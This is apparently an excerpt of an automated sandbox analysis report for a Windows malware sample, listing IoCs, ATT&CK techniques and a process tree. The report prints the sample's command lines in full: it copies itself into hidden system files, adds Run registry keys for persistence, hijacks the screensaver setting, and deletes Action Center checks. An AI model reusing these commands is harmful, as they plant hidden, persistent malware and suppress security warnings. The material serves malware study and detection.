Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
3852	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3908	iexplore.exe
3908	iexplore.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3908	iexplore.exe
3908	iexplore.exe
516	IEXPLORE.EXE
516	IEXPLORE.EXE
516	IEXPLORE.EXE
516	IEXPLORE.EXE
3908	iexplore.exe
3908	iexplore.exe
548	IEXPLORE.EXE
548	IEXPLORE.EXE
548	IEXPLORE.EXE
548	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4036 wrote to memory of 3536	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	85
PID 4036 wrote to memory of 3536	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	85
PID 4036 wrote to memory of 3536	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	85
PID 4036 wrote to memory of 4488	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	86
PID 4036 wrote to memory of 4488	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	86
PID 4036 wrote to memory of 4488	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	86
PID 3536 wrote to memory of 3996	3536	cmd.exe	89
PID 3536 wrote to memory of 3996	3536	cmd.exe	89
PID 3536 wrote to memory of 3996	3536	cmd.exe	89
PID 4488 wrote to memory of 1596	4488	cmd.exe	90
PID 4488 wrote to memory of 1596	4488	cmd.exe	90
PID 4488 wrote to memory of 1596	4488	cmd.exe	90
PID 4036 wrote to memory of 2316	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	95
PID 4036 wrote to memory of 2316	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	95
PID 4036 wrote to memory of 2316	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	95
PID 4036 wrote to memory of 4964	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	97
PID 4036 wrote to memory of 4964	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	97
PID 4036 wrote to memory of 4964	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	97
PID 4036 wrote to memory of 3972	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	99
PID 4036 wrote to memory of 3972	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	99
PID 4036 wrote to memory of 3972	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	99
PID 4036 wrote to memory of 3236	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	100
PID 4036 wrote to memory of 3236	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	100
PID 4036 wrote to memory of 3236	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	100
PID 4036 wrote to memory of 2332	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	103
PID 4036 wrote to memory of 2332	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	103
PID 4036 wrote to memory of 2332	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	103
PID 4036 wrote to memory of 5104	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	104
PID 4036 wrote to memory of 5104	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	104
PID 4036 wrote to memory of 5104	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	104
PID 4036 wrote to memory of 864	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	107
PID 4036 wrote to memory of 864	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	107
PID 4036 wrote to memory of 864	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	107
PID 4036 wrote to memory of 4428	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	108
PID 4036 wrote to memory of 4428	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	108
PID 4036 wrote to memory of 4428	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	108
PID 4036 wrote to memory of 3744	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	111
PID 4036 wrote to memory of 3744	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	111
PID 4036 wrote to memory of 3744	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	111
PID 4036 wrote to memory of 3368	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	112
PID 4036 wrote to memory of 3368	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	112
PID 4036 wrote to memory of 3368	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	112
PID 3972 wrote to memory of 1412	3972	cmd.exe	115
PID 3972 wrote to memory of 1412	3972	cmd.exe	115
PID 3972 wrote to memory of 1412	3972	cmd.exe	115
PID 3236 wrote to memory of 4896	3236	cmd.exe	116
PID 3236 wrote to memory of 4896	3236	cmd.exe	116
PID 3236 wrote to memory of 4896	3236	cmd.exe	116
PID 5104 wrote to memory of 3868	5104	cmd.exe	117
PID 5104 wrote to memory of 3868	5104	cmd.exe	117
PID 5104 wrote to memory of 3868	5104	cmd.exe	117
PID 4036 wrote to memory of 4760	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	126
PID 4036 wrote to memory of 4760	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	126
PID 4036 wrote to memory of 4760	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	126
PID 4760 wrote to memory of 4008	4760	cmd.exe	128
PID 4760 wrote to memory of 4008	4760	cmd.exe	128
PID 4760 wrote to memory of 4008	4760	cmd.exe	128
PID 4036 wrote to memory of 2996	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	129
PID 4036 wrote to memory of 2996	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	129
PID 4036 wrote to memory of 2996	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	129
PID 4036 wrote to memory of 1504	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	131
PID 4036 wrote to memory of 1504	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	131
PID 4036 wrote to memory of 1504	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	131
PID 4036 wrote to memory of 856	4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe	133

Views/modifies file attributes 1 TTPs 20 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1596	attrib.exe
2732	attrib.exe
1724	attrib.exe
2368	attrib.exe
4696	attrib.exe
3996	attrib.exe
3488	attrib.exe
532	attrib.exe
3388	attrib.exe
448	attrib.exe
4540	attrib.exe
4008	attrib.exe
4608	attrib.exe
4764	attrib.exe
636	attrib.exe
3680	attrib.exe
3104	attrib.exe
2548	attrib.exe
1164	attrib.exe
3288	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2656

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3836

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3924

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3988

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4072

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3608

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:1320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H "%appdata%\daemon.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H "%windir%\system32sysrunc.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H "C:\Windows\system32sysrunc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename "%appdata%\daemon.exe" "trash1.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2316
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename "%windir%\system32\sysrunc.exe" "trash2.dat"
  2⤵
  PID:4964
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\plugininstall.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2332
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5104
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"
  2⤵
  PID:864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3744
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3368
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - Views/modifies file attributes
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe"
  2⤵
  PID:2996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:636
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f
  2⤵
  PID:856
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Windows\system32\sysrunc.exe"
    3⤵
    - Views/modifies file attributes
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"
  2⤵
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:3748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4416
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Windows\system32\sysrunc.exe"
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  PID:780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
    3⤵
    - Views/modifies file attributes
    PID:3388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  PID:1120
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3680
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
  2⤵
  PID:940
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
    3⤵
    PID:2564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1676
- C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops autorun.inf file
  - Modifies Control Panel
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:856
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"
      4⤵
      Views/modifies file attributes
      PID:3104
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe"
    3⤵
    PID:728
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"
    3⤵
    PID:2388
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:652
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f
      4⤵
      Adds Run key to start application
      PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Windows\system32\sysrunc.exe"
      4⤵
      Drops file in System32 directory
      Views/modifies file attributes
      PID:448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"
    3⤵
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:668
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Windows\system32\sysrunc.exe"
      4⤵
      Sets file to hidden
      Drops file in System32 directory
      Views/modifies file attributes
      PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f
      4⤵
      Adds Run key to start application
      PID:3568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
      4⤵
      Views/modifies file attributes
      PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2368
- - C:\Windows\SysWOW64\cmd.exe
